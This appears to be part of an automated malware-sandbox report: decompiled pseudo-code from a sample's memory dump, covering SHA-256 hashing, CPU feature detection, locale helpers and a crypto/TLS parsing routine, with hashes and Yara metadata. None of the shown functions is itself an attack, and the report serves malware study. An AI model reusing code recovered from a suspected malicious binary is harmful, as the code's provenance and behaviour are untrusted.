					 *((intOrPtr*)(_t209 + 8)) = (_t205 ^ _t206 ^ _t558 >> 0x0000000a) + (_t207 ^ _t208 ^ _t297 >> 0x00000003) +  *((intOrPtr*)(_t209 - 0x38)) +  *((intOrPtr*)(_t209 - 0x14));
					_t204 = _t209 + 4;
					_t14 =  &_v12;
					 *_t14 = _v12 - 1;
					_v40 = _t204;
				} while ( *_t14 != 0);
				_v40 = _v40 & 0x00000000;
				_t563 = _v44;
				_v32 = _v60;
				_v20 = _v48;
				_v24 = _v64;
				_v16 = _v52;
				_t212 = _v56;
				_v28 = _v68;
				_t299 = 2;
				_v8 = _v56;
				_v36 = _v72;
				do {
					_t405 = 0x19;
					_t213 = L0042DF6A(_t212, _t405);
					_t406 = 0xb;
					_t214 = L0042DF6A(_v8, _t406);
					_t407 = 6;
					_t215 = L0042DF6A(_v8, _t407);
					_t216 = _v40;
					_t42 = _t216 + 0x465670; // 0x428a2f98
					_t506 = (_t213 ^ _t214 ^ _t215) + ((_v16 ^ _v20) & _v8 ^ _v20) +  *_t42 +  *((intOrPtr*)(_t603 + _v40 - 0x148)) + _t563;
					_v32 = _v32 + _t506;
					_t408 = 0x16;
					_t217 = L0042DF6A(_v36, _t408);
					_t409 = 0xd;
					_t218 = L0042DF6A(_v36, _t409);
					_t219 = L0042DF6A(_v36, _t299);
					_t568 = _v32;
					_v12 = ((_v28 | _v36) & _v24 | _v28 & _v36) + (_t217 ^ _t218 ^ _t219) + _t506;
					_t411 = 0x19;
					_t222 = L0042DF6A(_t568, _t411);
					_t412 = 0xb;
					_t223 = L0042DF6A(_t568, _t412);
					_t413 = 6;
					_t224 = L0042DF6A(_t568, _t413);
					_t225 = _v40;
					_t60 = _t225 + 0x465674; // 0x71374491
					_t513 = (_t222 ^ _t223 ^ _t224) + ((_v16 ^ _v8) & _t568 ^ _v16) +  *_t60 +  *((intOrPtr*)(_t603 + _v40 - 0x144)) + _v20;
					_v24 = _v24 + _t513;
					_t414 = 0x16;
					_t226 = L0042DF6A(_v12, _t414);
					_t415 = 0xd;
					_t227 = L0042DF6A(_v12, _t415);
					_t228 = L0042DF6A(_v12, _t299);
					_t573 = _v24;
					_v20 = ((_v36 | _v12) & _v28 | _v36 & _v12) + (_t226 ^ _t227 ^ _t228) + _t513;
					_t422 = 0x19;
					_t231 = L0042DF6A(_t573, _t422);
					_t423 = 0xb;
					_t232 = L0042DF6A(_t573, _t423);
					_t424 = 6;
					_t233 = L0042DF6A(_t573, _t424);
					_t234 = _v40;
					_t79 = _t234 + 0x465678; // 0xb5c0fbcf
					_t520 = (_t231 ^ _t232 ^ _t233) + ((_v32 ^ _v8) & _t573 ^ _v8) +  *_t79 +  *((intOrPtr*)(_t603 + _v40 - 0x140)) + _v16;
					_v28 = _v28 + _t520;
					_t425 = 0x16;
					_t235 = L0042DF6A(_v20, _t425);
					_t426 = 0xd;
					_t236 = L0042DF6A(_v20, _t426);
					_t237 = L0042DF6A(_v20, _t299);
					_t578 = _v28;
					_v16 = ((_v12 | _v20) & _v36 | _v12 & _v20) + (_t235 ^ _t236 ^ _t237) + _t520;
					_t433 = 0x19;
					_t240 = L0042DF6A(_t578, _t433);
					_t434 = 0xb;
					_t241 = L0042DF6A(_t578, _t434);
					_t435 = 6;
					_t242 = L0042DF6A(_t578, _t435);
					_t243 = _v40;
					_t98 = _t243 + 0x46567c; // 0xe9b5dba5
					_t527 = (_t240 ^ _t241 ^ _t242) + ((_v24 ^ _v32) & _t578 ^ _v32) +  *_t98 +  *((intOrPtr*)(_t603 + _v40 - 0x13c)) + _v8;
					_v36 = _v36 + _t527;
					_t436 = 0x16;
					_t244 = L0042DF6A(_v16, _t436);
					_t437 = 0xd;
					_t245 = L0042DF6A(_v16, _t437);
					_t246 = L0042DF6A(_v16, _t299);
					_t583 = _v36;
					_v8 = ((_v16 | _v20) & _v12 | _v16 & _v20) + (_t244 ^ _t245 ^ _t246) + _t527;
					_t444 = 0x19;
					_t249 = L0042DF6A(_t583, _t444);
					_t445 = 0xb;
					_t250 = L0042DF6A(_t583, _t445);
					_t446 = 6;
					_t251 = L0042DF6A(_t583, _t446);
					_t252 = _v40;
					_t117 = _t252 + 0x465680; // 0x3956c25b
					_t534 = (_t249 ^ _t250 ^ _t251) + ((_v24 ^ _v28) & _t583 ^ _v24) +  *_t117 +  *((intOrPtr*)(_t603 + _v40 - 0x138)) + _v32;
					_t254 = _v12 + _t534;
					_t447 = 0x16;
					_v12 = _t254;
					_v44 = _t254;
					_t255 = L0042DF6A(_v8, _t447);
					_t448 = 0xd;
					_t256 = L0042DF6A(_v8, _t448);
					_t454 = ((_v16 | _v8) & _v20 | _v16 & _v8) + (_t255 ^ _t256 ^ L0042DF6A(_v8, _t299)) + _t534;
					_t588 = _v12;
					_v32 = _t454;
					_v60 = _t454;
					_t455 = 0x19;
					_t260 = L0042DF6A(_t588, _t455);
					_t456 = 0xb;
					_t261 = L0042DF6A(_t588, _t456);
					_t457 = 6;
					_t262 = L0042DF6A(_t588, _t457);
					_t263 = _v40;
					_t138 = _t263 + 0x465684; // 0x59f111f1
					_t541 = (_t260 ^ _t261 ^ _t262) + ((_v28 ^ _v36) & _t588 ^ _v28) +  *_t138 +  *((intOrPtr*)(_t603 + _v40 - 0x134)) + _v24;
					_t265 = _v20 + _t541;
					_t458 = 0x16;
					_v20 = _t265;
					_v48 = _t265;
					_t266 = L0042DF6A(_v32, _t458);
					_t459 = 0xd;
					_t267 = L0042DF6A(_v32, _t459);
					_t465 = ((_v32 | _v8) & _v16 | _v32 & _v8) + (_t266 ^ _t267 ^ L0042DF6A(_v32, _t299)) + _t541;
					_t593 = _v20;
					_v24 = _t465;
					_v64 = _t465;
					_t466 = 0x19;
					_t271 = L0042DF6A(_t593, _t466);
					_t467 = 0xb;
					_t272 = L0042DF6A(_t593, _t467);
					_t468 = 6;
					_t273 = L0042DF6A(_t593, _t468);
					_t158 = _v40 + 0x465688; // 0x923f82a4
					_t548 = (_t271 ^ _t272 ^ _t273) + ((_v36 ^ _v12) & _t593 ^ _v36) +  *_t158 +  *((intOrPtr*)(_t603 + _v40 - 0x130)) + _v28;
					_t276 = _v16 + _t548;
					_t469 = 0x16;
					_v16 = _t276;
					_v52 = _t276;
					_t277 = L0042DF6A(_v24, _t469);
					_t470 = 0xd;
					_t278 = L0042DF6A(_v24, _t470);
					_t476 = ((_v24 | _v32) & _v8 | _v24 & _v32) + (_t277 ^ _t278 ^ L0042DF6A(_v24, _t299)) + _t548;
					_t598 = _v16;
					_v28 = _t476;
					_v68 = _t476;
					_t477 = 0x19;
					_t282 = L0042DF6A(_t598, _t477);
					_t478 = 0xb;
					_t283 = L0042DF6A(_t598, _t478);
					_t479 = 6;
					_t284 = L0042DF6A(_t598, _t479);
					_t285 = _v40;
					_t180 = _t285 + 0x46568c; // 0xab1c5ed5
					_t555 = (_t282 ^ _t283 ^ _t284) + ((_v12 ^ _v20) & _t598 ^ _v12) +  *_t180 +  *((intOrPtr*)(_t603 + _v40 - 0x12c)) + _v36;
					_t287 = _v8 + _t555;
					_t480 = 0x16;
					_v8 = _t287;
					_v56 = _t287;
					_t288 = L0042DF6A(_v28, _t480);
					_t481 = 0xd;
					_t289 = L0042DF6A(_v28, _t481);
					_t487 = ((_v24 | _v28) & _v32 | _v24 & _v28) + (_t288 ^ _t289 ^ L0042DF6A(_v28, _t299)) + _t555;
					_t563 = _v12;
					_t294 = _v40 + 0x20;
					_v40 = _t294;
					_t212 = _v8;
					_v36 = _t487;
					_v72 = _t487;
				} while (_t294 < 0x100);
				_t295 = _v76;
				do {
					asm("movups xmm0, [eax]");
					asm("movups xmm1, [ecx+eax]");
					asm("paddd xmm1, xmm0");
					asm("movups [eax], xmm1");
					_t295 = _t295 + 0x10;
					_t299 = _t299 - 1;
				} while (_t299 != 0);
				return 0;
			}





















































































































































                              0x0042e02d
                              0x0042e03b
                              0x0042e044
                              0x0042e045
                              0x0042e04b
                              0x0042e04d
                              0x0042e05e
                              0x0042e060
                              0x0042e063
                              0x0042e063
                              0x0042e067
                              0x0042e06c
                              0x0042e06d
                              0x0042e074
                              0x0042e079
                              0x0042e085
                              0x0042e08a
                              0x0042e091
                              0x0042e096
                              0x0042e0a0
                              0x0042e0ad
                              0x0042e0b0
                              0x0042e0b3
                              0x0042e0b3
                              0x0042e0b7
                              0x0042e0b7
                              0x0042e0c2
                              0x0042e0c6
                              0x0042e0c9
                              0x0042e0cf
                              0x0042e0d5
                              0x0042e0dd
                              0x0042e0e0
                              0x0042e0e3
                              0x0042e0e9
                              0x0042e0ea
                              0x0042e0ed
                              0x0042e0f0
                              0x0042e0f2
                              0x0042e0f5
                              0x0042e101
                              0x0042e102
                              0x0042e10e
                              0x0042e10f
                              0x0042e11f
                              0x0042e12c
                              0x0042e139
                              0x0042e13b
                              0x0042e13e
                              0x0042e13f
                              0x0042e14b
                              0x0042e14c
                              0x0042e158
                              0x0042e173
                              0x0042e176
                              0x0042e17d
                              0x0042e17e
                              0x0042e185
                              0x0042e18a
                              0x0042e191
                              0x0042e196
                              0x0042e1a3
                              0x0042e1b2
                              0x0042e1bf
                              0x0042e1c2
                              0x0042e1c5
                              0x0042e1c6
                              0x0042e1cf
                              0x0042e1d3
                              0x0042e1df
                              0x0042e1fa
                              0x0042e1ff
                              0x0042e204
                              0x0042e205
                              0x0042e20c
                              0x0042e211
                              0x0042e218
                              0x0042e21d
                              0x0042e22a
                              0x0042e239
                              0x0042e246
                              0x0042e249
                              0x0042e24c
                              0x0042e24d
                              0x0042e259
                              0x0042e25a
                              0x0042e266
                              0x0042e281
                              0x0042e286
                              0x0042e28b
                              0x0042e28c
                              0x0042e293
                              0x0042e298
                              0x0042e29f
                              0x0042e2a4
                              0x0042e2b1
                              0x0042e2c0
                              0x0042e2cd
                              0x0042e2d0
                              0x0042e2d3
                              0x0042e2d4
                              0x0042e2e0
                              0x0042e2e1
                              0x0042e2ed
                              0x0042e308
                              0x0042e30d
                              0x0042e312
                              0x0042e313
                              0x0042e31a
                              0x0042e31f
                              0x0042e326
                              0x0042e32b
                              0x0042e338
                              0x0042e347
                              0x0042e357
                              0x0042e35a
                              0x0042e35c
                              0x0042e35d
                              0x0042e360
                              0x0042e363
                              0x0042e36f
                              0x0042e370
                              0x0042e395
                              0x0042e397
                              0x0042e39c
                              0x0042e3a1
                              0x0042e3a4
                              0x0042e3a5
                              0x0042e3ac
                              0x0042e3b1
                              0x0042e3b8
                              0x0042e3bd
                              0x0042e3ca
                              0x0042e3d9
                              0x0042e3e9
                              0x0042e3ec
                              0x0042e3ee
                              0x0042e3ef
                              0x0042e3f2
                              0x0042e3f5
                              0x0042e401
                              0x0042e402
                              0x0042e427
                              0x0042e429
                              0x0042e42e
                              0x0042e433
                              0x0042e436
                              0x0042e437
                              0x0042e43e
                              0x0042e443
                              0x0042e44a
                              0x0042e44f
                              0x0042e466
                              0x0042e476
                              0x0042e47c
                              0x0042e480
                              0x0042e481
                              0x0042e484
                              0x0042e487
                              0x0042e493
                              0x0042e494
                              0x0042e4b9
                              0x0042e4bb
                              0x0042e4c0
                              0x0042e4c5
                              0x0042e4c8
                              0x0042e4c9
                              0x0042e4d0
                              0x0042e4d5
                              0x0042e4dc
                              0x0042e4e1
                              0x0042e4ee
                              0x0042e4fd
                              0x0042e50d
                              0x0042e510
                              0x0042e512
                              0x0042e513
                              0x0042e516
                              0x0042e519
                              0x0042e525
                              0x0042e526
                              0x0042e54b
                              0x0042e550
                              0x0042e553
                              0x0042e556
                              0x0042e55e
                              0x0042e561
                              0x0042e564
                              0x0042e564
                              0x0042e56d
                              0x0042e575
                              0x0042e575
                              0x0042e578
                              0x0042e57c
                              0x0042e580
                              0x0042e583
                              0x0042e586
                              0x0042e586
                              0x0042e593

                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: 7d2c2cc3d4cde4dcaf023a8c72c5331c45858dbf77c38728ee6bef2936cd2860
                              • Instruction ID: d2f6e491d6231a107fc41d217f42edd413d61a9e26abbc05e72102d8d9d5ba4e
                              • Opcode Fuzzy Hash: 7d2c2cc3d4cde4dcaf023a8c72c5331c45858dbf77c38728ee6bef2936cd2860
                              • Instruction Fuzzy Hash: E4126432F002199BDF04DBA5DD52AEDB3F2BF8C714F26806AD515B7381DA746D418B88
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0042F2AB, Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E0042F2AB(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0x46ad0c =  *0x46ad0c & 0x00000000;
				 *0x46a010 =  *0x46a010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0x46a010 =  *0x46a010 | 0x00000002;
				 *0x46ad0c = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0x46ad10; // 0x2
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0x46ad10 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x46a010 =  *0x46a010 | 0x00000004;
						 *0x46ad0c = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x46a010; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x46ad0c = 3;
								 *0x46a010 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0x46ad0c = 5;
									 *0x46a010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0x46ad10; // 0x2
					_t84 = _t87 | 0x00000001;
					 *0x46ad10 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}




























                              0x0042f2ab
                              0x0042f2ae
                              0x0042f2bc
                              0x0042f2cb
                              0x0042f43e
                              0x0042f444
                              0x0042f444
                              0x0042f2d1
                              0x0042f2d7
                              0x0042f2e2
                              0x0042f2e8
                              0x0042f2eb
                              0x0042f2ec
                              0x0042f2f0
                              0x0042f2f1
                              0x0042f2f3
                              0x0042f2f6
                              0x0042f2f9
                              0x0042f302
                              0x0042f321
                              0x0042f324
                              0x0042f325
                              0x0042f326
                              0x0042f32a
                              0x0042f32b
                              0x0042f32d
                              0x0042f330
                              0x0042f333
                              0x0042f336
                              0x0042f37b
                              0x0042f37b
                              0x0042f381
                              0x0042f388
                              0x0042f38b
                              0x0042f38e
                              0x0042f391
                              0x0042f394
                              0x0042f398
                              0x0042f39b
                              0x0042f39c
                              0x0042f3a1
                              0x0042f3a4
                              0x0042f3a6
                              0x0042f3a9
                              0x0042f3ac
                              0x0042f3af
                              0x0042f3b7
                              0x0042f3ba
                              0x0042f3bd
                              0x0042f3c2
                              0x0042f3c2
                              0x0042f3bd
                              0x0042f3cf
                              0x0042f3d1
                              0x0042f3d8
                              0x0042f3e7
                              0x0042f3f2
                              0x0042f3f5
                              0x0042f3f8
                              0x0042f409
                              0x0042f40f
                              0x0042f414
                              0x0042f417
                              0x0042f425
                              0x0042f42a
                              0x0042f42f
                              0x0042f439
                              0x0042f439
                              0x0042f42a
                              0x0042f409
                              0x0042f3e7
                              0x00000000
                              0x0042f3cf
                              0x0042f33b
                              0x0042f345
                              0x0042f36a
                              0x0042f370
                              0x0042f373
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F2C4
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: 236d1fbffacee29ac2072d7646572aa4fef94a32c5531d6a83f556afadd58c04
                              • Instruction ID: e14bd6c5a23f6b1c66d5c7ff4ee57b294b174c7bca6555511f9b3344fc2a95c0
                              • Opcode Fuzzy Hash: 236d1fbffacee29ac2072d7646572aa4fef94a32c5531d6a83f556afadd58c04
                              • Instruction Fuzzy Hash: CD419171A006159BEB14CF55E88579ABBF4FB04310FA0857BD805E7350E3B89964CF99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00449143, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                              Download Yara Rule
                              C-Code - Quality: 59%
                              			E00449143(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x46a00c; // 0x7df2b874
				_v8 = _t16 ^ _t54;
				_t35 = L00440972(__ebx, __ecx, __edx);
				_t50 =  *(L00440972(_t35, __ecx, __edx) + 0x34c);
				_t53 = E0044921B(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = E0044C0C1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = E0044C0C1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E00449373(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return L0042F61B(_v8 ^ _t54);
			}














                              0x0044914e
                              0x00449155
                              0x00449163
                              0x0044916b
                              0x0044917a
                              0x00449186
                              0x00449197
                              0x0044919f
                              0x004491b0
                              0x004491b9
                              0x004491c9
                              0x004491db
                              0x004491e4
                              0x004491e6
                              0x004491e7
                              0x00000000
                              0x004491e7
                              0x004491e4
                              0x004491bb
                              0x004491be
                              0x004491f5
                              0x004491f5
                              0x004491f8
                              0x004491fb
                              0x004491c0
                              0x004491c0
                              0x004491c1
                              0x004491e8
                              0x004491e8
                              0x004491f3
                              0x00000000
                              0x00000000
                              0x004491f3
                              0x004491be
                              0x004491a1
                              0x004491a1
                              0x004491a3
                              0x00449218

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(?,00000000,0043A4F3,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409D1
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 004409DE
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00449197
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$InfoLocale_abort
                              • String ID:
                              • API String ID: 1663032902-0
                              • Opcode ID: ceb4882ea065f60f5ad7294d839268fede538349977b750f8739ae3ac4be151b
                              • Instruction ID: b23328cae5c81917ebfd14750ae41a33c51d25984a081319408a22a244c59ce8
                              • Opcode Fuzzy Hash: ceb4882ea065f60f5ad7294d839268fede538349977b750f8739ae3ac4be151b
                              • Instruction Fuzzy Hash: 6621C57251520BABFB289E25DC8AABB77A8EB04314F1001BBFD01C7241EB799D41DB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00449373, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E00449373(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = L00440972(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(L00448EC7( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}















                              0x00449378
                              0x0044937b
                              0x00449380
                              0x00449383
                              0x004493a7
                              0x004493b0
                              0x004493da
                              0x004493dc
                              0x004493b8
                              0x004493b8
                              0x004493bb
                              0x004493be
                              0x004493be
                              0x004493c1
                              0x004493c4
                              0x004493d8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004493d8
                              0x004493a9
                              0x004493a9
                              0x004493a9
                              0x004493a9
                              0x004493e2

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(?,00000000,0043A4F3,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00449111,00000000,00000000,?), ref: 0044939F
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$InfoLocale_abort_free
                              • String ID:
                              • API String ID: 2692324296-0
                              • Opcode ID: 4f2b17c09b9bc9ec24eb5d51f95e87c1389d952b0495a652764951bb53b878ea
                              • Instruction ID: e088f05e704de54da1791b93b42debfc98a9ea1916be425aaf6d46112b02c247
                              • Opcode Fuzzy Hash: 4f2b17c09b9bc9ec24eb5d51f95e87c1389d952b0495a652764951bb53b878ea
                              • Instruction Fuzzy Hash: 4BF07D32900116BBFB285E24CC057BB7758EB46358F04442AEC15E3280EB78FD01D6D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041A3F8, Relevance: .6, Instructions: 585COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E0041A3F8(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed char _v7;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v34;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				void _v72;
				void* __edi;
				void* _t251;
				void _t254;
				signed char _t272;
				void* _t274;
				intOrPtr _t275;
				intOrPtr* _t280;
				void* _t281;
				void* _t285;
				intOrPtr _t292;
				void* _t318;
				signed short _t321;
				intOrPtr _t326;
				void* _t338;
				void* _t350;
				void* _t362;
				signed char _t370;
				signed int _t371;
				intOrPtr _t374;
				intOrPtr* _t375;
				signed int _t377;
				intOrPtr _t379;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t395;
				signed int _t436;
				signed int _t438;
				signed char _t442;
				intOrPtr _t445;
				signed int _t447;
				void* _t448;
				signed char _t449;
				void* _t454;
				intOrPtr _t475;
				intOrPtr _t480;
				intOrPtr _t481;
				intOrPtr* _t482;
				intOrPtr _t483;
				intOrPtr _t484;
				intOrPtr _t485;
				signed int _t486;
				intOrPtr _t488;
				signed int _t489;
				void* _t490;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t497;

				_t375 = __ecx;
				_v12 = __edx;
				_t377 = 0xa;
				_t442 =  *(__ecx + 0x308) & 0x0000ffff;
				_t486 = 0;
				_t251 = memset( &_v72, 0, _t377 << 2);
				_t491 = _t490 + 0xc;
				 *(_t375 + 0x318) = _t251;
				_v28 = _t251;
				_v24 = _t251;
				_t480 =  *_a4;
				_v60 = _t480;
				_t379 = _t480;
				_v56 = _t379;
				if(_t442 < 0x8000) {
					L9:
					_push(0x48);
					_t254 = L0042D5FA();
					_v72 = _t254;
					if(_t254 == 0) {
						L8:
						_t486 = 0xffffff83;
						L120:
						E0041A295( &_v72);
						L004196CA(_t375);
						return _t486;
					}
					L00431810(_t480, _t254, 0, 0x48);
					_t492 = _t491 + 0xc;
					if(_t480 - _v56 + 3 > _a8) {
						L2:
						_t486 = 0xfffffeb8;
						goto L120;
					}
					L004189B4(_t480 + _v12,  &_v20);
					_t384 = _v20;
					_t481 = _t480 + 3;
					_v60 = _t481;
					_v16 = _t384;
					if(_t384 > 0x481e) {
						goto L2;
					}
					_t445 = _v56;
					if(_t384 - _t445 + _t481 != _a8) {
						goto L2;
					}
					_t385 = _v52;
					if(_t384 == 0) {
						L24:
						_v44 = _v44 & 0x00000000;
						_v48 = _t385;
						if(_t385 != 0) {
							L30:
							_v34 = _v34 & 0x0000fffb;
							_t482 = L0042D5FA();
							_v64 = _t482;
							if(_t482 == 0) {
								goto L8;
							}
							L00431810(_t482, _t482, 0, 0x370);
							_t387 = _v52;
							_t447 = 1;
							_t493 = _t492 + 0xc;
							 *(_t375 + 0x318) = 1;
							if(_t387 <= 0 || _t387 <= 1) {
								L50:
								if(_t486 != 0) {
									goto L120;
								}
								 *(_t375 + 0x318) = 2;
								if(_v48 <= _t486) {
									_t448 = 0;
									L64:
									_t449 = _t448 + 1;
									L65:
									_t389 = _v34 & _t449;
									_v24 = _t389;
									if(_t389 == 0 || _t486 == 0) {
										 *(_t375 + 0x318) = 3;
										if(_v48 <= 0) {
											L103:
											if(_v24 == 0 || _t486 == 0) {
												 *(_t375 + 0x318) = 4;
												if(_v40 != 0) {
													_t486 =  ==  ? _v40 : _t486;
												}
												_t486 = E0041A146( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t486,  &_v72);
												_t272 =  *(_t375 + 0x308) & 0x0000ffff;
												_t395 = _t272 & 0x00000080;
												if(_t395 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
													 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
													_t486 = 0;
												}
												if(_t486 == 0) {
													if((_t272 & 0x00000030) == 0x10) {
														 *((char*)(_t375 + 0x311)) = 5;
													}
												} else {
													if(_t395 == 0) {
														E0041A0E7(_t375, _t486);
													}
													 *(_t375 + 0x1f0) = _t486;
												}
